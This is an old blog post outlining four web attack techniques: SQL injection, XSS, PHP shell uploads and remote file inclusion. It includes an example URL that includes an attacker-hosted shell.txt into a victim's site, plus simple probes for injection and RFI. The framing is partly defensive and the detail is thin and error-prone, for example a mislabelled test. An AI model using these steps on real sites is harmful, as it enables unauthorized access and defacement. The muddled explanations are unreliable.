Quantcast
Your Ad Here Os Configurations
Add to Google Reader or Homepage

Thursday, August 11, 2011

Web Hacking - How it was done

Web Hacking:

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:


Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website!


P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:


Code:
yoursite.com/index.php?id=545



just add a ' like this at the end


code:
yoursite.com/index.php?id=545'



2. XSS:


XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and hack the website up. 


3. Shells:

Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.


4. RFI:

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:


yoursite.com/shell.txt

and you found a vulnerable site to RFI... then you can do as follow:


code:
victimssite.com/index.php?page=yousite.com/shell.txt



This will again give u the access of your victim's sites FTP , just as shell so you can hack up anything you want.

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:


code:
yoursite.com/index.php?id=545



just add something liek this at the end


code:
yoursite.com/index.php?id=http://www.google.com



And if it incldes the google page into your page, that means its vulnerable to RFI.

No comments:

Post a Comment